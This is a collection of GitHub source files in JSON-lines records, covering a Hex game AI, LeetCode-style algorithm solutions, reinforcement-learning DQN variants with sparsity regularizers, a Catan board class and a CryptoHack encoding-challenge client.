distance_graph.fill(INF)\r\n\r\n    for i in range(len(initial)):\r\n        now = initial[i]\r\n        visited = []\r\n        distance_graph[now[1], now[0]] = 0\r\n\r\n        if player == agent1:\r\n            a1_update_d(board, now, distance_graph, visited)\r\n        if player == agent2:\r\n            a2_update_d(board, now, distance_graph, visited)\r\n\r\n    if player == agent1:\r\n        return min(distance_graph[:, -1])\r\n    if player == agent2:\r\n        return min(distance_graph[-1])\r\n\r\n\r\ndef a1_update_d(board, now, distance_graph, visited):\r\n    border_reached = False\r\n\r\n    if board.border(agent1, now) == True:\r\n        border_reached = True\r\n\r\n    cur_distance = distance_graph[now[1], now[0]]\r\n    shortest = INF\r\n    next = []\r\n\r\n    neighbors = board.get_neighbors(now)\r\n\r\n
    for i in range(len(neighbors)):\r\n        if neighbors[i] not in visited and board.is_color(neighbors[i], agent2) == False:\r\n            next_distance = cur_distance + 1\r\n\r\n            if board.is_color(neighbors[i], agent1) == True and cur_distance < distance_graph[\r\n                neighbors[i][1], neighbors[i][0]]:\r\n                distance_graph[neighbors[i][1], neighbors[i][0]] = cur_distance\r\n                next = neighbors[i]\r\n                shortest = cur_distance\r\n            elif next_distance < distance_graph[neighbors[i][1], neighbors[i][0]]:\r\n                distance_graph[neighbors[i][1], neighbors[i][0]] = next_distance\r\n\r\n                if next_distance < shortest:\r\n                    next = neighbors[i]\r\n                    shortest = next_distance\r\n\r\n    visited.append(now)\r\n\r\n    if (now[0] + 1, now[1]) in neighbors:\r\n        for i in range(len(neighbors)):\r\n            if board.is_color(neighbors[i], agent1) == True:\r\n                break\r\n        else:\r\n            next = (now[0] + 1, now[1])\r\n\r\n    if len(next) != 0 and border_reached == False:\r\n        a1_update_d(board, next, distance_graph, visited)\r\n\r\n\r\ndef a2_update_d(board, now, distance_graph, visited):\r\n    border_reached = False\r\n\r\n    if board.border(agent2, now) == True:\r\n        border_reached = True\r\n\r\n    cur_distance = distance_graph[now[1], now[0]]\r\n    shortest = INF\r\n    next = []\r\n\r\n    neighbors = board.get_neighbors(now)\r\n\r\n    for i in range(len(neighbors)):\r\n        if neighbors[i] not in visited and board.is_color(neighbors[i], agent1) == False:\r\n            next_distance = cur_distance + 1\r\n\r\n            if board.is_color(neighbors[i], agent2) == True and cur_distance < distance_graph[\r\n                neighbors[i][1], neighbors[i][0]]:\r\n                distance_graph[neighbors[i][1], neighbors[i][0]] = cur_distance\r\n                next = neighbors[i]\r\n                shortest = cur_distance\r\n            elif next_distance < distance_graph[neighbors[i][1], neighbors[i][0]]:\r\n                distance_graph[neighbors[i][1], neighbors[i][0]] = next_distance\r\n\r\n                if next_distance < shortest:\r\n                    next = neighbors[i]\r\n                    shortest = next_distance\r\n\r\n    visited.append(now)\r\n\r\n    if (now[0], now[1] + 1) in neighbors:\r\n        for i in range(len(neighbors)):\r\n            if board.is_color(neighbors[i], agent2) == True:\r\n                break\r\n        else:\r\n            next = (now[0], now[1] + 1)\r\n\r\n    if len(next) != 0 and border_reached == False:\r\n        a2_update_d(board, next, distance_graph, visited)\r\n\r\n\r\ndef ai_make_move(board):\r\n    move = df_movelist.to_numpy()\r\n    x = move[-1, 0]\r\n    y = move[-1, 1]\r\n\r\n    make_move = (int(x), int(y))\r\n    board.place(make_move, agent1)\r\n    board.print()\r\n\r\n\r\ndef pl_make_move(board):\r\n    global df_movelist\r\n    print('Next move.')\r\n    x = int(ord(input(' x(a,b,c...): ')) - 97)\r\n    y = int(input(' y(0,1,2...): '))\r\n\r\n    while not board.is_empty((x, y)):\r\n        print('Invalid place, input again!!!')\r\n        x = int(ord(input(' x(a,b,c...): ')) - 97)\r\n        y = int(input(' y(0,1,2...): '))\r\n\r\n    df_movelist = df_movelist.append({'x': x, 'y': y}, ignore_index=True)\r\n\r\n    board.place((x, y), agent2)\r\n    board.print()\r\n\r\n\r\n# Play the game.\r\ndef play_game(board, method):\r\n    for i in range(SIZE * SIZE):\r\n        board_copy = copy.deepcopy(board)\r\n\r\n        eval_val = alphabeta(board_copy, DEPTH, -INF, INF, method, agent1, agent2)\r\n        df_alphabeta.to_csv('alphabeta.txt', index=False, mode='a')\r\n        ai_make_move(board)\r\n        if board.check_win(agent1):\r\n            print('A1 WINS')\r\n            break\r\n\r\n        pl_make_move(board)\r\n        if board.check_win(agent2):\r\n            print('A2 WINS')\r\n            break\r\n\r\n\r\nDEPTH = 3\r\nboard = HexBoard(SIZE)\r\n\r\nplay_game(board, 
'Dijkstra')\r\n","repo_name":"Pengyu-Liu/RL","sub_path":"Hexgame/ourHexGame.py","file_name":"ourHexGame.py","file_ext":"py","file_size_in_byte":7273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39605619207","text":"\"\"\"\nСоздайте класс-генератор.\nЭкземпляр класса должен генерировать факториал числа в\nдиапазоне от start до stop с шагом step.\nЕсли переданы два параметра, считаем step=1.\nЕсли передан один параметр, также считаем start=1.\n\n\"\"\"\nfrom sem12.t_1 import FactorialOf\n\n\nclass FactorialIterator:\n def __init__(self, stop_i: int, start_i=1, step: int = 1):\n self._st = start_i\n self._end = stop_i\n self._step = step\n\n def __iter__(self):\n return self\n\n def __next__(self):\n while self._st < self._end:\n self._st += self._step\n return FactorialOf(self._st).out\n raise StopIteration\n\n\nif __name__ == '__main__':\n a = iter(FactorialIterator(10))\n for item in a:\n print(item)\n","repo_name":"am1bestofluck/python_insight","sub_path":"sem12/t_3.py","file_name":"t_3.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70963285609","text":"# soln 1 **********************************BEST SOLN *********************************\n\nclass Solution(object):\n def searchInsert(self, nums, target):\n '''\n - use binary search.\n - use left and right pointer to get mid...\n - (left + right )/ 2 to get mid.\n - compare mid with the target.\n \n - [2, 5, 6, 8, 9, 12, 14, 17]\n l (0) r len(nums) - 1\n '''\n r = len(nums) - 1\n l = 0\n \n while l <= r:\n mid = (l + r) // 2 # // means floor (Round numbers down to the nearest integer)\n if nums[mid] == target:\n return mid\n elif target < nums[mid]:\n r = mid - 1\n else:\n l = mid + 1\n return l\n \ns = Solution()\nprint(s.searchInsert([1,3,5,6], 2))\n# time complexity = O(logn) cutting list to half\n# space complexity = O(1)\n\n\n\n# soln 2\n\nclass Solution2(object):\n def searchInsert2(self, nums, target):\n \n if target > nums[len(nums) - 1]:\n return len(nums)\n \n for i in range(len(nums)):\n if nums[i] >= target:\n return i\n \ns = Solution2()\nprint(s.searchInsert2([1,3,5,6], 2))\n ","repo_name":"Jimmyopot/JimmyLeetcodeDev","sub_path":"Easy/search_insert_position.py","file_name":"search_insert_position.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2948800909","text":"import numpy as np\nimport torch\n\nfrom Experiment_Engine.networks import TwoLayerFullyConnected, TwoLayerDropoutFullyConnected, weight_init\nfrom Experiment_Engine.util import *\nfrom Experiment_Engine.Tilecoder3 import IHT, tiles\n\n\nclass NeuralNetworkFunctionApproximation:\n \"\"\"\n Parent class for all the neural networks\n summary: loss_per_step\n \"\"\"\n def __init__(self, config, summary=None):\n \"\"\"\n Config --- class that contains all the parameters in used in an experiment.\n Parameters in config:\n Name: Type: Default: Description: (Omitted when self-explanatory)\n num_actions int 3 Number of actions available to the agent\n gamma float 1.0 discount factor\n epsilon float 0.1 exploration parameter\n state_dims int 2 number of dimensions of the environment's states\n optim str 'sgd' optimization method\n lr float 0.001 learning rate\n\n # DQN parameters\n batch_size int 32 minibatch size\n tnet_update_freq int 10 the update frequency of the target network\n\n # Parameters 
for storing summaries\n store_summary bool False store the summary of the agent\n number_of_steps int 500000 Total number of environment steps\n \"\"\"\n assert isinstance(config, Config)\n check_attribute_else_default(config, 'current_step', 0)\n self.config = config\n\n self.num_actions = check_attribute_else_default(config, 'num_actions', 3)\n self.gamma = check_attribute_else_default(config, 'gamma', 1.0)\n self.epsilon = check_attribute_else_default(config, 'epsilon', 0.1)\n self.state_dims = check_attribute_else_default(config, 'state_dims', 2)\n self.optim = check_attribute_else_default(config, 'optim', 'sgd', choices=['sgd', 'adam', 'rmsprop'])\n self.lr = check_attribute_else_default(config, 'lr', 0.001)\n # DQN parameters\n self.batch_size = check_attribute_else_default(config, 'batch_size', 32)\n self.tnet_update_freq = check_attribute_else_default(config, 'tnet_update_freq', 10)\n self.replay_buffer = ReplayBuffer(config)\n # summary parameters\n self.store_summary = check_attribute_else_default(config, 'store_summary', False)\n self.number_of_steps = check_attribute_else_default(config, 'number_of_steps', 500000)\n if self.store_summary:\n assert isinstance(summary, dict)\n self.summary = summary\n self.loss_per_step = np.zeros(self.number_of_steps, dtype=np.float64)\n check_dict_else_default(self.summary, 'loss_per_step', self.loss_per_step)\n\n self.h1_dims = 32 # fixed parameter\n self.h2_dims = 256 # fixed parameter\n\n # policy network\n self.net = TwoLayerFullyConnected(self.state_dims, h1_dims=self.h1_dims, h2_dims=self.h2_dims,\n output_dims=self.num_actions)\n self.net.apply(weight_init)\n # target network\n self.target_net = TwoLayerFullyConnected(self.state_dims, h1_dims=self.h1_dims, h2_dims=self.h2_dims,\n output_dims=self.num_actions)\n self.target_net.apply(weight_init)\n\n if self.optim == 'sgd': self.optimizer = torch.optim.SGD(self.net.parameters(), lr=self.lr)\n elif self.optim == 'adam': self.optimizer = torch.optim.Adam(self.net.parameters(), lr=self.lr)\n elif self.optim == 'rmsprop': self.optimizer = torch.optim.RMSprop(self.net.parameters(), lr=self.lr)\n\n def compute_return(self, reward, state, termination):\n # Computes the Qlearning return\n with torch.no_grad():\n av_function = torch.max(self.target_net.forward(state), dim=1)[0]\n next_step_bool = torch.from_numpy((1 - np.int64(termination))).float()\n qlearning_return = torch.from_numpy(reward).float() + next_step_bool * self.gamma * av_function\n return qlearning_return\n\n def choose_action(self, state):\n p = np.random.rand()\n if p > self.epsilon:\n with torch.no_grad():\n # it is extremely unlikely (prob = 0) for there to be two actions with exactly the same action value\n optim_action = self.net.forward(state).argmax().numpy()\n return np.int64(optim_action)\n else:\n return np.random.randint(self.num_actions)\n\n def save_summary(self, current_loss):\n if not self.store_summary:\n return\n self.summary['loss_per_step'][self.config.current_step - 1] = current_loss\n\n def update_target_network(self):\n if (self.config.current_step % self.tnet_update_freq) == 0:\n self.target_net.load_state_dict(self.net.state_dict())\n\n\nclass ReplayBuffer:\n\n def __init__(self, config):\n \"\"\"\n Parameters in config:\n Name: Type: Default: Description: (Omitted when self-explanatory)\n state_dims int 2 number of dimensions of the environment's state\n buffer_size int 100 size of the buffer\n \"\"\"\n self.state_dims = check_attribute_else_default(config, 'state_dims', 2)\n self.buffer_size = 
check_attribute_else_default(config, 'buffer_size', 100)\n\n \"\"\" inner state \"\"\"\n self.start = 0\n self.length = 0\n\n self.state = np.empty((self.buffer_size, self.state_dims), dtype=np.float64)\n self.action = np.empty(self.buffer_size, dtype=int)\n self.reward = np.empty(self.buffer_size, dtype=np.float64)\n self.next_state = np.empty((self.buffer_size, self.state_dims), dtype=np.float64)\n self.next_action = np.empty(self.buffer_size, dtype=int)\n self.termination = np.empty(self.buffer_size, dtype=bool)\n\n def __getitem__(self, idx):\n if isinstance(idx, int):\n if idx < 0 or idx >= self.length:\n raise KeyError()\n elif isinstance(idx, np.ndarray):\n if (idx < 0).any() or (idx >= self.length).any():\n raise KeyError()\n shifted_idx = self.start + idx\n s = self.state.take(shifted_idx, axis=0, mode='wrap')\n a = self.action.take(shifted_idx, axis=0, mode='wrap')\n r = self.reward.take(shifted_idx, axis=0, mode='wrap')\n next_s = self.next_state.take(shifted_idx, axis=0, mode='wrap')\n next_a = self.next_action.take(shifted_idx, axis=0, mode='wrap')\n terminate = self.termination.take(shifted_idx, axis=0, mode='wrap')\n return s, a, r, next_s, next_a, terminate\n\n def store_transition(self, transition):\n if self.length < self.buffer_size:\n self.length += 1\n elif self.length == self.buffer_size:\n self.start = (self.start + 1) % self.buffer_size\n else:\n raise RuntimeError()\n\n storing_idx = (self.start + self.length - 1) % self.buffer_size\n state, action, reward, next_state, next_action, termination = transition\n self.state[storing_idx] = state\n self.action[storing_idx] = action\n self.reward[storing_idx] = reward\n self.next_state[storing_idx] = next_state\n self.next_action[storing_idx] = next_action\n self.termination[storing_idx] = termination\n\n def sample(self, sample_size):\n if sample_size > self.length or sample_size > self.buffer_size:\n raise ValueError(\"The sample size is to large.\")\n sampled_idx = np.random.randint(0, self.length, sample_size) # Sample any indices\n # sampled_idx = np.random.choice(self.length, size=sample_size, replace=False) # Sample unique indices\n return self.__getitem__(sampled_idx)\n\n\nclass VanillaDQN(NeuralNetworkFunctionApproximation):\n\n def __init__(self, config, summary=None):\n super(VanillaDQN, self).__init__(config, summary)\n\n def update(self, state, action, reward, next_state, next_action, termination):\n self.replay_buffer.store_transition(transition=(state, action, reward, next_state, next_action, termination))\n\n if self.replay_buffer.length < self.batch_size:\n self.save_summary(0)\n return\n\n state, action, reward, next_state, next_action, termination = self.replay_buffer.sample(self.batch_size)\n qlearning_return = self.compute_return(reward, next_state, termination)\n self.optimizer.zero_grad()\n prediction = torch.squeeze(self.net(state).gather(1, torch.from_numpy(action).view(-1,1)))\n loss = (qlearning_return - prediction).pow(2).mean()\n loss.backward()\n self.optimizer.step()\n\n self.save_summary(loss.detach().numpy())\n self.update_target_network()\n\n\nclass DistRegNeuralNetwork(NeuralNetworkFunctionApproximation):\n \"\"\"\n Neural network with distributional regularizers. 
This is the implementation of the ReLu + SKL network from:\n \"The Utility of Sparse Representations for Control in Reinforcement Learning\"\n - Vincent Liu, Raksha Kumaraswamy, Lei Le, and Martha White\n \"\"\"\n def __init__(self, config, summary=None):\n super(DistRegNeuralNetwork, self).__init__(config, summary=summary)\n \"\"\"\n Parameters in config:\n Name: Type: Default: Description: (Omitted when self-explanatory)\n reg_factor float 0.1 \n beta float 0.1 average max activation\n use_gamma bool False whether to use a gamma distribution instead of beta\n layer2_reg bool False whether to apply regularization only to the second\n layer \n beta_lb float False whether to set a lower bound for beta \n \"\"\"\n self.config = config\n self.reg_factor = check_attribute_else_default(config, 'reg_factor', 0.1)\n self.beta = check_attribute_else_default(config, 'beta', 0.1)\n self.use_gamma = check_attribute_else_default(config, 'use_gamma', False)\n self.beta_lb = check_attribute_else_default(config, 'beta_lb', False) # lower bounds beta by 0.1\n self.beta_fixed_lower_bound = 0.1\n\n def update(self, state, action, reward, next_state, next_action, termination):\n self.replay_buffer.store_transition(transition=(state, action, reward, next_state, next_action, termination))\n\n if self.replay_buffer.length < self.batch_size:\n self.save_summary(0)\n return\n\n state, action, reward, next_state, next_action, termination = self.replay_buffer.sample(self.batch_size)\n qlearning_return = self.compute_return(reward, next_state, termination)\n self.optimizer.zero_grad()\n x1, x2, x3 = self.net.forward(state, return_activations=True)\n prediction = torch.squeeze(x3.gather(1, torch.from_numpy(action).view(-1,1)))\n # unregularized loss\n loss = (qlearning_return - prediction).pow(2).mean()\n if self.use_gamma:\n layer2_average = x2.mean()\n kld_layer2 = self.kld(layer2_average)\n loss += self.reg_factor * kld_layer2 * self.h2_dims\n if self.beta_lb:\n kld_lb_layer2 = self.kld_lb(layer2_average)\n loss += self.reg_factor * kld_lb_layer2 * self.h2_dims\n else:\n layer2_average = x2.mean(dim=0)\n kld_layer2 = self.kld(layer2_average)\n loss += self.reg_factor * kld_layer2\n if self.beta_lb:\n kld_lb_layer2 = self.kld_lb(layer2_average)\n loss += self.reg_factor * kld_lb_layer2\n loss.backward()\n self.optimizer.step()\n\n self.save_summary(loss.detach().numpy())\n self.update_target_network()\n\n def kld_derivative(self, beta_hats):\n # Note: you can use either kld_derivative or kld. 
Both results in the same gradient when using autograd.\n positive_beta_hats = beta_hats[beta_hats > self.beta]\n first_term = 1 / positive_beta_hats\n second_term = torch.pow(first_term, 2) * self.beta\n kld_derivative = torch.sum((first_term - second_term))\n return kld_derivative\n\n def kld(self, beta_hats):\n positive_beta_hats = beta_hats[beta_hats > 0]\n high_beta_hats = positive_beta_hats[positive_beta_hats > self.beta]\n # the original kl divergence is: log(beta_hat) + (beta / beta_hat) - log(beta) - 1\n # however, since beta doesn't depend on the parameters of the network, omitting the term -log(beta) - 1 doesn't\n # have any effect on the gradient.\n return torch.sum(torch.log(high_beta_hats) + (self.beta / high_beta_hats))\n\n def kld_lb(self, beta_hats):\n # this is the same as kld but for applied when beta is less than 0.05, which enforces a lower bound on beta\n positive_beta_hats = beta_hats[beta_hats > 0]\n low_beta_hats = positive_beta_hats[positive_beta_hats < self.beta_fixed_lower_bound]\n return torch.sum(torch.log(low_beta_hats) + (self.beta / low_beta_hats))\n\n\nclass RegularizedNeuralNetwork(NeuralNetworkFunctionApproximation):\n \"\"\"\n Neural network with L1 or L2 regularization on the weights or the activations\n \"\"\"\n def __init__(self, config, summary=None):\n \"\"\"\n Parameters in config:\n Name: Type: Default: Description: (Omitted when self-explanatory)\n reg_factor float 0.1 factor for the regularization method\n reg_method string 'l1' regularization method. Choices: 'none', 'l1', 'l2'\n weights_reg bool False whether to apply regularization on the weights or\n the activations\n \"\"\"\n super(RegularizedNeuralNetwork, self).__init__(config, summary=summary)\n self.reg_factor = check_attribute_else_default(config, 'reg_factor', 0.1)\n self.reg_method = check_attribute_else_default(config, 'reg_method', 'l1',\n choices=['l1', 'l2'])\n self.weights_reg = check_attribute_else_default(config, 'weights_reg', False)\n\n if self.reg_method == 'l1':\n self.reg_function = torch.abs\n elif self.reg_method == 'l2':\n self.reg_function = lambda z: torch.pow(z, 2)\n\n def update(self, state, action, reward, next_state, next_action, termination):\n self.replay_buffer.store_transition(transition=(state, action, reward, next_state, next_action, termination))\n\n if self.replay_buffer.length < self.batch_size:\n self.save_summary(0)\n return\n\n state, action, reward, next_state, next_action, termination = self.replay_buffer.sample(self.batch_size)\n qlearning_return = self.compute_return(reward, next_state, termination)\n self.optimizer.zero_grad()\n x1, x2, x3 = self.net.forward(state, return_activations=True)\n # I don't like the line bellow because it is doing so many things. 
Here's a breakdown of what it does:\n # torch.squeeze - eliminates all the dimensions that are equal to 1\n # x3.gather - the first argument indicates the axis, the second argument indicates what item to gather\n # torch.from_numpy - converts the actions to a torch tensor\n # .view(-1, 1) - reshapes the tensor into tensor of shape batch_size x 1\n prediction = torch.squeeze(x3.gather(1, torch.from_numpy(action).view(-1,1)))\n loss = (qlearning_return - prediction).pow(2).mean()\n reg_loss = 0\n if self.weights_reg:\n for name, param in self.net.named_parameters():\n # Regularization is only applied to the representation part of the network\n if not name.startswith('fc3'):\n reg_loss += torch.sum(self.reg_function(param))\n else:\n reg_loss += torch.sum(self.reg_function(x2))\n loss += self.reg_factor * reg_loss\n loss.backward()\n self.optimizer.step()\n\n self.save_summary(loss.detach().numpy())\n self.update_target_network()\n\n\nclass DropoutNeuralNetwork(VanillaDQN):\n \"\"\"\n The dropout neural network applies dropout only to the prediction from the policy network when computing the TD\n error of Q-learning. Otherwise, the models are set to eval() when computing the target of the TD error and when\n selecting actions --- which multiplies the activations by the dropout probability. Reasoning: Both the target and\n the actions should be computed using action-values that are as accurate as possible. We don't care that the neural\n network that computes them is sparse; we just care about the values being accurate.\n \"\"\"\n def __init__(self, config, summary=None):\n assert isinstance(config, Config)\n super(DropoutNeuralNetwork, self).__init__(config, summary=summary)\n \"\"\"\n Parameters in config:\n Name: Type: Default: Description: (Omitted when self-explanatory)\n dropout_probability float 0.5 probability of setting activations to zero\n \"\"\"\n self.dropout_probability = check_attribute_else_default(config, 'dropout_probability', 0.5)\n\n # policy network\n self.net = TwoLayerDropoutFullyConnected(self.state_dims, h1_dims=self.h1_dims, h2_dims=self.h2_dims,\n output_dims=self.num_actions,\n dropout_probability=self.dropout_probability)\n self.net.apply(weight_init)\n self.net.train()\n # target network\n self.target_net = TwoLayerDropoutFullyConnected(self.state_dims, h1_dims=self.h1_dims, h2_dims=self.h2_dims,\n output_dims=self.num_actions,\n dropout_probability=self.dropout_probability)\n self.target_net.apply(weight_init)\n self.target_net.eval()\n\n if self.optim == 'sgd': self.optimizer = torch.optim.SGD(self.net.parameters(), lr=self.lr)\n elif self.optim == 'adam': self.optimizer = torch.optim.Adam(self.net.parameters(), lr=self.lr)\n elif self.optim == 'rmsprop': self.optimizer = torch.optim.RMSprop(self.net.parameters(), lr=self.lr)\n\n def choose_action(self, state):\n p = np.random.rand()\n if p > self.epsilon:\n self.net.eval()\n with torch.no_grad():\n optim_action = self.net.forward(state).argmax().numpy()\n self.net.train()\n return np.int64(optim_action)\n else:\n return np.random.randint(self.num_actions)\n\n\nclass TileCoderFA:\n\n def __init__(self, config=None):\n super().__init__()\n assert isinstance(config, Config)\n \"\"\"\n Parameters in config:\n Name: Type: Default: Description: (Omitted when self-explanatory)\n num_tilings int 32 Number of tilings\n tiling_length int 8 The length of the tiling side\n num_actions int 3 Number of actions\n gamma float 1.0 discount factor\n epsilon float 0.1 exploration parameter\n state_dims int 2 Number of 
dimensions\n lr float 0.1 Learning rate\n scaling_factor np.array [1,1] The scaling factor and scaling offset are such so\n scaling_offset np.array [0,0] (observation + scaling_offset) * scaling factor\n is within 0 and 1\n \"\"\"\n self.num_tilings = check_attribute_else_default(config, 'num_tilings', 32)\n self.tiling_length = check_attribute_else_default(config, 'tiling_length', 8)\n self.num_actions = check_attribute_else_default(config, 'num_actions', 3)\n self.gamma = check_attribute_else_default(config, 'gamma', 1.0)\n self.epsilon = check_attribute_else_default(config, 'epsilon', 0.1)\n self.state_dims = check_attribute_else_default(config, 'state_dims', 2)\n self.lr = check_attribute_else_default(config, 'lr', 0.1)\n self.scaling_factor = check_attribute_else_default(config, 'scaling_factor',\n np.ones(self.state_dims, dtype=np.float64))\n self.scaling_offset = check_attribute_else_default(config, 'scaling_offset',\n np.ones(self.state_dims, dtype=np.float64))\n\n # Why the self.tiling_length + 1? Because of the random off-set of each tiling, some tilings might not cover\n # the entire region of (self.tiling_length) ** self.state_dims. However, all the observations are scaled\n # down to that region. Hence, if we don't add the + 1, some observations might fall outside of the region\n # covered by the tilings.\n self.tiles_per_tiling = (self.tiling_length + 1) ** self.state_dims\n self.num_tiles = self.num_tilings * self.tiles_per_tiling\n self.theta = 0.001 * np.random.random(self.num_tiles * self.num_actions)\n self.iht = IHT(self.num_tiles)\n\n \"\"\" Scales input states to (0,1) and then multiplies by the side_length of a tiling \"\"\"\n def scaling_function(self, state):\n assert len(state) == self.state_dims\n scaled_state = (state + self.scaling_offset) * self.scaling_factor * self.tiling_length\n return scaled_state\n\n \"\"\" Updates the value of the parameters corresponding to the state and action \"\"\"\n def update(self, state, action, reward, next_state, next_action, termination):\n current_estimate = self.get_action_values(state)[action]\n qlearning_return = self.compute_return(reward, next_state, termination)\n value = qlearning_return - current_estimate\n scaled_state = self.scaling_function(state)\n\n tile_indices = np.asarray(\n tiles(self.iht, self.num_tilings, scaled_state), dtype=int) + (action * self.num_tiles)\n self.theta[tile_indices] += self.lr * value\n\n \"\"\" Returns the QLearning return of a specific state pair \"\"\"\n def compute_return(self, reward, state, termination):\n max_av = np.max(self.get_action_values(state))\n qlearning_return = reward + (1 - np.int64(termination)) * max_av\n return qlearning_return\n\n def get_action_values(self, state):\n scaled_state = self.scaling_function(state)\n tile_indices = np.asanyarray(tiles(self.iht, self.num_tilings, scaled_state), dtype=np.int64)\n action_values = np.zeros(self.num_actions, dtype=np.float64)\n for i in range(self.num_actions):\n av = np.sum(self.theta[tile_indices + (i * self.num_tiles)])\n action_values[i] = av\n return action_values\n\n def choose_action(self, state):\n p = np.random.rand()\n if p > self.epsilon:\n argmax_av = np.int64(self.get_action_values(state).argmax())\n return argmax_av\n else:\n return np.random.randint(self.num_actions)\n\n def save_summary(self):\n 
pass\n","repo_name":"JFernando4/SparseRepresentations_wReplayBuffer","sub_path":"Experiment_Engine/function_approximators.py","file_name":"function_approximators.py","file_ext":"py","file_size_in_byte":24242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6068983012","text":"def transfer_time_to_second(time_str):\n h, m, s = map(int, time_str.split(':'))\n\n h *= 60 * 60\n m *= 60\n\n return h + m + s\n\n\ndef transfer_second_to_time(second):\n h = second // (60 * 60)\n second -= 60 * 60 * h\n m = second // 60\n second -= 60 * m\n\n return f'{str(h).zfill(2)}:{str(m).zfill(2)}:{str(second).zfill(2)}'\n\n\ndef solution(play_time, adv_time, logs):\n answer = 0\n\n play_time = transfer_time_to_second(play_time)\n adv_time = transfer_time_to_second(adv_time)\n\n dp = [0] * (play_time + 1)\n\n for log in logs:\n start, end = log.split('-')\n start = transfer_time_to_second(start)\n end = transfer_time_to_second(end)\n\n dp[start] += 1\n dp[end] -= 1\n\n for i in range(1, len(dp)):\n dp[i] = dp[i - 1] + dp[i]\n\n for i in range(1, len(dp)):\n dp[i] = dp[i - 1] + dp[i]\n\n dp_count = 1\n max_value = 0\n\n # 0번째 대응\n sum_value = dp[adv_time]\n if sum_value > max_value:\n max_value = sum_value\n answer = 0\n\n while dp_count + adv_time <= play_time:\n sum_value = dp[dp_count + adv_time] - dp[dp_count]\n if sum_value > max_value:\n max_value = sum_value\n answer = dp_count + 1\n dp_count += 1\n return transfer_second_to_time(answer)\n","repo_name":"bruno-wi/Backjun","sub_path":"Python/contest/카카오_2021_광고삽입.py","file_name":"카카오_2021_광고삽입.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74502851047","text":"# https://leetcode.com/problems/lemonade-change/submissions/\nfrom collections import defaultdict\nfrom typing import List\nclass Solution:\n def lemonadeChange(self, bills: List[int]) -> bool:\n cash = defaultdict(int)\n \n for b in bills:\n if b == 10:\n if cash[5] == 0:\n return False\n cash[5] -= 1\n elif b == 20:\n # it is critical to give 10 as change first whenever possible\n if cash[10] > 0 and cash[5] > 0:\n cash[10] -= 1\n cash[5] -= 1\n elif cash[5] > 2:\n cash[5] -= 3\n else:\n return False\n cash[b] += 1\n # print(b, cash)\n \n return True","repo_name":"linminhtoo/algorithms","sub_path":"greedy/easy/lemonadeChange.py","file_name":"lemonadeChange.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17065993472","text":"from Tile import Tile\n\n\nclass Board:\n\n def __init__(self, numbers):\n self.board = []\n input_index = 0\n\n def addRow(row_length, row_number, row_number_from_center, input_index):\n self.board.append([Tile(0, [0, 0])])\n\n if (row_number_from_center > 0):\n x_coordinate = row_number_from_center\n for i in range(row_length):\n self.board[row_number].append(\n Tile(numbers[input_index], [x_coordinate, row_number]))\n input_index += 1\n x_coordinate += 1\n else:\n for i in range(row_length):\n self.board[row_number].append(\n Tile(numbers[input_index], [len(self.board[row_number])-1, row_number]))\n input_index += 1\n\n self.board[row_number].append(Tile(0, [0, 0]))\n return input_index\n\n input_index = addRow(3, 0, 2, input_index)\n input_index = addRow(4, 1, 1, input_index)\n input_index = addRow(5, 2, 0, input_index)\n input_index = addRow(4, 3, -1, input_index)\n input_index = addRow(3, 4, -2, 
input_index)\n\n def getItemAtIndex(self, index1, index2):\n return self.board[index1][index2]\n\n def getAllNumbers(self):\n board = []\n for i in range(5):\n row = []\n for t in range(len(self.board[i])):\n row.append(str(self.board[i][t].number))\n board.append('-'.join(row))\n return \"\\n\".join(board)\n\n def __repr__(self):\n board = []\n for i in range(5):\n row = []\n for t in range(len(self.board[i])):\n row.append(str(self.board[i][t].coordinates))\n board.append('-'.join(row))\n return \"\\n\".join(board)\n","repo_name":"tudor-seserman/CatanBoardOptimizer","sub_path":"Board.py","file_name":"Board.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23465635284","text":"from pwn import *\nimport json\nimport base64\nimport binascii\nimport codecs\nimport sys\nfrom Crypto.Util.number import *\n\nr = remote('socket.cryptohack.org', 13377, level = 'debug')\n\ndef json_recv():\n line = r.recvline()\n return json.loads(line.decode())\n\ndef json_send(hsh):\n request = json.dumps(hsh).encode()\n r.sendline(request)\n\ndef decode(t, data):\n if t == 'base64':\n return base64.b64decode(data).decode('utf-8')\n elif t == 'hex':\n return bytes.fromhex(data).decode('utf-8')\n elif t == 'bigint':\n return bytes.fromhex(data.replace('0x', '')).decode('utf-8')\n elif t == 'rot13':\n return codecs.encode(data, 'rot_13')\n elif t == 'utf-8':\n return \"\".join(chr(i) for i in received[\"encoded\"])\n\nwhile True:\n\n received = json_recv()\n\n if \"flag\" in received:\n print(\"FLAG: %s\" % received[\"flag\"])\n sys.exit(0)\n\n decifrado = decode(received[\"type\"], received[\"encoded\"])\n print(\"\\nDecifrado \" + decifrado);\n\n to_send = {\n \"decoded\": decifrado\n }\n\n json_send(to_send)\n\n","repo_name":"matingb/university","sub_path":"criptografia/pwntools_example.py","file_name":"pwntools_example.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24037556181","text":"import glob\r\nimport os\r\nimport re\r\nimport numpy as np\r\nimport pandas as pd\r\nimport seaborn as sns\r\nimport matplotlib.ticker as mtick\r\n\r\nfrom matplotlib import pyplot as plt\r\n\r\nimport PythonModules.progressBar as pgB\r\nimport PythonModules.logger_finder as logger_finder\r\n\r\nfrom tkinter.filedialog import askopenfilename\r\n\r\n# plots rel trend plots\r\ndef data_importer(inputcsv, manual, range_arr):\r\n inputdf = pd.read_csv(inputcsv)\r\n\r\n ori_path = os.getcwd()\r\n path = 'X://PLC//Prod 